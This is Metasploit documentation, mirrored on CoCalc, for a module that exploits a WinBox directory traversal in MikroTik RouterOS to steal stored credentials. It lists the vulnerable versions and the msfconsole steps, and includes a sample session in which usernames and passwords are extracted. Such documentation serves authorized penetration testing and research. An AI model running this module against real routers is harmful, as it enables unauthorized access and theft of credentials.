CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/auxiliary/gather/mikrotik_winbox_fileread.md
Views: 11784

Vulnerable Application

MikroTik RouterOS allows unauthenticated remote attackers to read arbitrary files through a directory traversal through the WinBox interface (typically port 8291).

Vulnerable versions of MikroTik RouterOS:

  • (bugfix) 6.30.1-6.40.7

  • (current) 6.29-6.42

  • (RC) 6.29rc1-6.43rc3

MikroTik images can be downloaded from here

Adding Users

To add users to the MikroTik device, use the following commands:

Get the groups first

/user group print

Add a user

/user add name=[name] password=[password] group=[group]

Verification Steps

  1. Start msfconsole

  2. Do: use auxiliary/gather/mikrotik_winbox_fileread

  3. Do: set rhosts [IP]

  4. Do: run

  5. You should credentials.

Options

Scenarios

Mikrotik Cloud Router RouterOS 6.40.4

msf5 > use auxiliary/gather/mikrotik_winbox_fileread 
msf5 auxiliary(gather/mikrotik_winbox_fileread) > set rhosts 1.1.1.1
rhosts => 1.1.1.1
msf5 auxiliary(gather/mikrotik_winbox_fileread) > run

[*] Running for 1.1.1.1...
[*] 1.1.1.1 - Session ID: 54
[*] 1.1.1.1 - Requesting user database through exploit
[*] 1.1.1.1 - Exploit successful, attempting to extract usernames & passwords
[*] 1.1.1.1 - Extracted Username: "write" and password "write"
[*] 1.1.1.1 - Extracted Username: "read" and password "read"
[*] 1.1.1.1 - Extracted Username: "admin" and password ""
[*] 1.1.1.1 - Extracted Username: "user2" and password "password1"
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed